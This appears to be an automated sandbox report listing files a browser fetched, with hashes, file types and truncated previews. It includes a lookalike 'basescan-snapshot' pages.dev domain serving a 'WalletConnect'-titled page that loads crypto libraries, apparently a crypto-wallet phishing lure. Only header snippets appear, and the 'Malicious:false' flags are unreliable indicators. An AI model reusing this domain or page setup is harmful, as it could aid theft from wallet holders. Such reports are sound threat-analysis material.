                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):7814
                                                                                                                                                                                                                                              Entropy (8bit):7.600608005717682
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+7moYNMtKwXllau/Krw4PN+upgKelOicqPi:kYNg7XnfKU4PVgdfq
                                                                                                                                                                                                                                              MD5:A039D7DA5EBE03EADA8001CBAAF38B8F
                                                                                                                                                                                                                                              SHA1:66DC30066A300BD1FEB2AF3084B948DABA4AD0B6
                                                                                                                                                                                                                                              SHA-256:D320687AB4EF942D050DDFC3AD16D905FB865BA8D73CE0275F0E3A5BE854A3F1
                                                                                                                                                                                                                                              SHA-512:D9BD680C6C2138F8CBD5E0BAC53849DE0AF268418BA2716E2706A20FCB2113AF8A2053D7132853590DEA8AB272EE8150ACD48E0BBD2BD6A4E4092AC0DDA6FC80
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/d927716dbf.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............F...@.............<...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):533
                                                                                                                                                                                                                                              Entropy (8bit):4.842348522336825
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:SSlnnREVPIcVEfL6RfLKqjutJFuJX4M//E+hnEFzSKHrwXZeQMhrvReWDE9jLEUt:90PIufzju74JXZxGzSKLFQKiZN3QsHn
                                                                                                                                                                                                                                              MD5:23DC56CD738A494E5314BB03C12D93A8
                                                                                                                                                                                                                                              SHA1:E8BDD91D626D0A524009690679CFB82E79824FCD
                                                                                                                                                                                                                                              SHA-256:DDF278EDEA22AA7587F1021EF4538459C1500444699835404E81CCB707496D43
                                                                                                                                                                                                                                              SHA-512:74F4FB7148EA1D0ABAEEC58BE285A107D2FD3DAFC0A1FDCD182EDC3EBBB6C1CAB958C8FFFFE9718BB2DF7F7C5ED5BD9E16742C47B5C0CFB1D4728B46411321D6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/components/hs.focus-state.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSFocusState={init:function(){var collection=$('.js-focus-state input:not([type="checkbox"], [type="radio"]), .js-focus-state textarea, .js-focus-state select');if(!collection.length)return;collection.on('focusin',function(){var $this=$(this),$thisParent=$this.closest('.js-focus-state');$thisParent.addClass('u-focus-state');});collection.on('focusout',function(){var $this=$(this),$thisParent=$this.closest('.js-focus-state');$thisParent.removeClass('u-focus-state');});}};})(jQuery);
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (20363), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):20541
                                                                                                                                                                                                                                              Entropy (8bit):5.220121183522609
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:2YhLSLf4UzgCyKnxRsyPMbOXrEQAkxHOxvqAQD75zfS5vIXm3YzGp/ARdOgHhgzx:3LSLAUzgCpRMbcxHOxvwD7pS5vezy/AY
                                                                                                                                                                                                                                              MD5:18D4D460CCAA3D518B6C3D6B3388506F
                                                                                                                                                                                                                                              SHA1:5A8C2BB899EBC1A75AB1AA2103C5A9BE4FADDA8F
                                                                                                                                                                                                                                              SHA-256:CC41677B202887CA83E2C6DE0234822EF1332FE943AFAB84C12BB7B20A275E1F
                                                                                                                                                                                                                                              SHA-512:75B668F53E24D86A9157980BEB5E14C9765E7B65D2A50E180124FE2FDCA33EC8AC4DC7D1D10BAB4E8C341679B742654EF30FC2B86CB61FF66CCE68093F4E53A9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/popper.js/dist/umd/popper.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:/*.. Copyright (C) Federico Zivolo 2018.. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT)... */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:null,n=e.offsetParent;n===o&&e.nextElementSibling;)n=(e=e.nextElementSibling).offsetPar
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                              Entropy (8bit):4.269608306496812
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TMQWfXAotcGBtaBfFEC:ALMBX
                                                                                                                                                                                                                                              MD5:0706F9A4AF62E45FE10BA424B571D291
                                                                                                                                                                                                                                              SHA1:1AC62EDFFE0F55283C869EE6598F9953AA7391AC
                                                                                                                                                                                                                                              SHA-256:32C7F18860C1DF99D40910996452BCDD0B1FAE866FE849D9DFD21D8D57BC762C
                                                                                                                                                                                                                                              SHA-512:783675C115F8CF797D0E2F1A481EB9DDEDD2DBC54033A7D21D4ECE0269A3CCDE76FBC3B099AF050D4499F492996AA4B381A514C4DA315B7DFDDE0722935A5654
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:function e(n){return function(r){return n?.[r]}}export{e as b};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (53742), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):53742
                                                                                                                                                                                                                                              Entropy (8bit):5.509891575554894
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:ViajUwwofD46SMEgPawGGzMT3VA7Mbitokqx5sYiUdMEk/8s4Hd:ml5nbgok0sYiUdMET
                                                                                                                                                                                                                                              MD5:571AA9B070B19711C7687D069A134842
                                                                                                                                                                                                                                              SHA1:3D79B781F7EEF6366E9C218B87F3043BF1C151AD
                                                                                                                                                                                                                                              SHA-256:FB0765F427819D8869A6B2E77A3F2951CB24AB16F248D571DF225A918FAF7793
                                                                                                                                                                                                                                              SHA-512:30AB4699657B897C62C85D68CED88BC4B2A05B0E754919768C5807B63BC430F7A12062B0C884CAE6CE05CB3CE40C0808C9866A8C65EAC44F98F553F5140FFC53
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://d107ul3j3wrui0.cloudfront.net/up/script_asset/710c81a103.js
                                                                                                                                                                                                                                              Preview:var HypeLab;(()=>{"use strict";var e={618:function(e,t,n){var i=this&&this.__awaiter||function(e,t,n,i){return new(n||(n=Promise))((function(o,s){function r(e){try{l(i.next(e))}catch(e){s(e)}}function a(e){try{l(i.throw(e))}catch(e){s(e)}}function l(e){var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(r,a)}l((i=i.apply(e,t||[])).next())}))};Object.defineProperty(t,"__esModule",{value:!0}),t.trackEvent=t.loadAd=void 0;const o=n(55),s=n(5);function r(){const e=(0,o.getConfig)();if(e.baseUrl)return e.baseUrl;switch(e.environment){case"local":return"http://api.lvh.me:8080";case"development":return"https://api.hypelab-staging.com";case"production":return"https://api.hypelab.com"}}t.loadAd=function(e){return i(this,void 0,void 0,(function*(){const t=(0,o.getConfig)(),n=(0,o.getIdentity)(),i=(0,o.getFraud)();try{yield Promise.allSettled([n.refresh(),i.refresh()]);const a=document.body.clientWidth,l=document.body.clientHeight,d=yield fetch(new URL("/v1/reques
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):11094
                                                                                                                                                                                                                                              Entropy (8bit):7.975023406154428
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:N1ND2SmoDo5uw1iDNyNStJUDMyRFPxfZ0SF6GdOYwVhodas7fkW613A/Ou4k:L4toDUuwYNqrMgBlRVwVqzfSFbxk
                                                                                                                                                                                                                                              MD5:78F7E7B8685BC98D8A935754D05ABE07
                                                                                                                                                                                                                                              SHA1:9E94E6F3EB3F05EC5A223CDAC43580EF0DC0640E
                                                                                                                                                                                                                                              SHA-256:81BEABB9E8141FC7CA1BF557E1F1F2356313E100D4EABC4CAE691CD0C403C8C6
                                                                                                                                                                                                                                              SHA-512:8406743149D9ABD3710F6E712DCE695001E8ED9601500219FCF402B943F563E1ACE9C9354650E5BB79119A71AB66646E5C10B35F9EF668C3DDD4DE0B3DD11743
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/betblocker-DBd5sP60.png
                                                                                                                                                                                                                                              Preview:RIFFN+..WEBPVP8LA+../M...U.z.m.%.......6y..SS......[..U3........Z..>..}Y..*....0g...N...9)....Pa..!P.3'Co.[.[S.f.H._...aN9......Y=<S...3...Sn.a.;..F..5L-.B..fho.ax:n;..4...'.03...I..l.....0...'-wg....h.R;`..[..<.Q.....r...&.........j.QR..nU..SR.d.V.......f.V%wxwe...J.%I.$I.-.............qw7.&.U...$Y.$......Et..~.>.c~@}E.O.zQ...tb.v.z...K.m..m....C.m.|.-.....U..w..w7.^.NR}8..7I..U<..q..~..,..u./...\....g...'T.! .....@.Al.a.I.[.F.6.q.T...P=..`..eR....$~(M..U...x.....{`E..[..p...`.r4l../8.,....A..%..D...S.f.#XV.|<..t.HO8e.n...#....m.=../3P+Z.....d.).e...!....h..."?...H.....9....+X..`..Z.i#.)(......,3.>g.AA^=0...e..........9..8...iY....0.A.....^sV.n4;....#.....1...~....`4...a.0.6.lp.z......c..gR.2.B.z.@V=0.=..>.$^..bh....Ir...t0.;$..3...T.....[.....`@L....N....@....G.j....s*U...uW..P]0.L.q..bd..#7X...!.=(q..r7.`.w=.p..w..ww5.N3p...*...HH.u.....q<.%.~%...3.+....k..B$}....~.l.Q@.;.....W...Yt.V..@Q.%.".....C...^........L....>.z.2...^..e..b....u...?.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14018)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):14063
                                                                                                                                                                                                                                              Entropy (8bit):5.158170296059324
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:LkUvfdC/NqVgnUnsfWsfXsfdsfvH/Rs/qXxW3F2TO3BQd2N0+t92dene1R4s56V:LkUvVC/NqViU0fRuqB4x//GeneALV
                                                                                                                                                                                                                                              MD5:BAD6410B24F73A7135B596B027EA0E2A
                                                                                                                                                                                                                                              SHA1:0754CF53F3C36F122E2E4E31CD2BB07671B42171
                                                                                                                                                                                                                                              SHA-256:5C96906CC640B94DC35785F59F5707DCB727AAD9CC8AD77A3591FC049FD319A9
                                                                                                                                                                                                                                              SHA-512:F19261B25BBAFB16890E2A310F2FB75C95DC42C23CAE350F5A3E6511A55907A4CF68E2B4345BDC6792904F7FBE01A12F834721B0FA85327A2C8E2FF5E0B00C07
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{Y as r}from"./manifest-e71017e8.js";const t=`.pointer-events-none{pointer-events:none}.sticky{position:sticky}.inset-0{inset:0}.-bottom-1{bottom:-.25rem}.-bottom-1\\.5{bottom:-.375rem}.-left-3{left:-.75rem}.-left-3\\.5{left:-.875rem}.-top-1\\.5{top:-.375rem}.-top-2{top:-.5rem}.bottom-16{bottom:4rem}.bottom-2{bottom:.5rem}.bottom-2\\.5{bottom:.625rem}.bottom-5{bottom:1.25rem}.left-1{left:.25rem}.left-1\\.5{left:.375rem}.left-16{left:4rem}.left-3{left:.75rem}.left-4{left:1rem}.left-6{left:1.5rem}.right-3{right:.75rem}.right-4{right:1rem}.top-0\\.5{top:.125rem}.top-1{top:.25rem}.top-10{top:2.5rem}.top-15{top:3.75rem}.top-2{top:.5rem}.top-2\\.5{top:.625rem}.top-4{top:1rem}.top-6{top:1.5rem}.top-8{top:2rem}.top-\\[-1px\\]{top:-1px}.z-0{z-index:0}.z-20{z-index:20}.z-\\[11\\]{z-index:11}.z-\\[1\\]{z-index:1}.-mx-1{margin-left:-.25rem;margin-right:-.25rem}.mx-3{margin-left:.75rem;margin-right:.75rem}.mx-auto{margin-left:auto;margin-right:auto}.my-0{margin-top:0;margin-bottom:0}.my-1{mar
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):888
                                                                                                                                                                                                                                              Entropy (8bit):7.744783800203496
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:kAkrGQLHxziNh8yJgVAVk105d6sUuE6aeShD2vdm:kAODcwrR8ENavQ
                                                                                                                                                                                                                                              MD5:34EA192F4DC1A92AD9C4749330BA122C
                                                                                                                                                                                                                                              SHA1:4C33BC86E3E00B539D9FE8AA9DA201F9449AE424
                                                                                                                                                                                                                                              SHA-256:744E990E1CBBCC0A8CFDDA7DD07CB98A237B456C95AE5BB10EF9D0584A6BDFEF
                                                                                                                                                                                                                                              SHA-512:46A1C9B1094578FB4A1B544E53368C2FDD0DE36A2FD878F14E821BC47AB9C2D8883F8876015591851319E5C3A6C778D8DAB3EDBFA8BF1B78B5E12D717F98102A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/DOGE.black.png
                                                                                                                                                                                                                                              Preview:RIFFp...WEBPVP8Ld.../c......m.?.9..i...S.m...MW...$E.?.....b....TZ.J.h.o.T.~[GKwa=..../..+...U..*...z.@..EA......~.2^.&..~$.<(.TTT.(8..$ER.33v6.3,w.....P...Cp#I..\.=h........q..|....6..=6V.....pw....).V......,.......vi...\H. .C"...B....5(e.%..Z.....T...4VKP.2....z.w...,H..t....w.e......{..$.?!......y,..,.4{.,{Z....Fi~}.._.....S@7K..-V..)...K..F.....3.....r........8.N>0;&~j3.(.=W..$...R.>......C..O."...o.+.r..[..t.....W.>}.....I...x......#R..p%........zi..Oc...'q...2h...sz;.j......L.....1.].<.(P.\.A...>.h......7..c.D...4.K..,........Hq2A..|.A...MED.b9.i.w..?)`.E$ST.........../....3...o.q;..P..U.}..x..e.}..o...K......x....*.y.bv.*...N...I.tk..1. ...c.l"M].av.;'.I.I..Xs.7..WK.p#...9b....6.uK.w... ;a...A_v..YTC....v..S.Z..P.nyB5-s..O.js&...ZS.....K..1.V*X..2....Q.v....Z..k"N..8.F..Z..k.N.}:....Z..k....pb...{5..s...........=Y...2'...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):246957
                                                                                                                                                                                                                                              Entropy (8bit):7.929733008291323
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:0/yBlm0CFC7kgWr569f5E503D5138aMHnwO9j0O3j:EyLmbgW6xq504fn99j0OT
                                                                                                                                                                                                                                              MD5:096948929317B43EF8FDCBF5EF86B2AC
                                                                                                                                                                                                                                              SHA1:4DD2599530B199A1A94B3F462FB85C172FDD9B85
                                                                                                                                                                                                                                              SHA-256:708285CB695E0E57FD146927CC7E85B6E2400EDCB5779AC98BB02AB62AE9F5C6
                                                                                                                                                                                                                                              SHA-512:22D23EFC146A5989A07644DA16BD030889BFF918E4480F6C0938A92EEC7E27B6EF6A5B4A457533D55F6234099C0FF8B7C20DCC4E8532516EA478D13E32AB6BAA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.......~.....PLTE...0.~5..@3<..-.t<..2.z.A4=..2.=..!A54.=..4..@5=..6.>.. B68.>..!D7!C68. A5..B.>4"...:2.70./..2+.1+!.../*.)']u*.........&n].t~.iv.ck.......................................................c..x.........J....R..m..].....0....w..h..W..=....c....Z....o.....N..".....5...d.......K.1....W.......q.Dx............M.5...._h......A..&.....f..i.0Y....;..-../.......y....hW..)..^..3z......|..]..B....4.....+V....!....^O.kN..)..*.}.~......{%.|i0..^....=.TG..Rk..vx}.u..u$D..e.M.y(.LA...npt.n.va.X....}~p)....F:plF.g.fghM..2}m..w...MsC.?-~`..D7..q..w..kp\.X[`vV..|e.zm\X7@l.QSY.w]WG~./.mP..sh7a9.rX`O..kb9a..1#.dQ.lWIKQeI..jQ.cT[C..bJSE.HD,2V..YE.$..[b.YOT>.<>D.ZD.O;+M.L;..T?'G#.OFE5..L:$D..D363 /06.E3m...>..9.#($*(.Y...4)G...#..+"1...............E}(....tRNS........"'(224=BBHQSR_``lox........................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):145
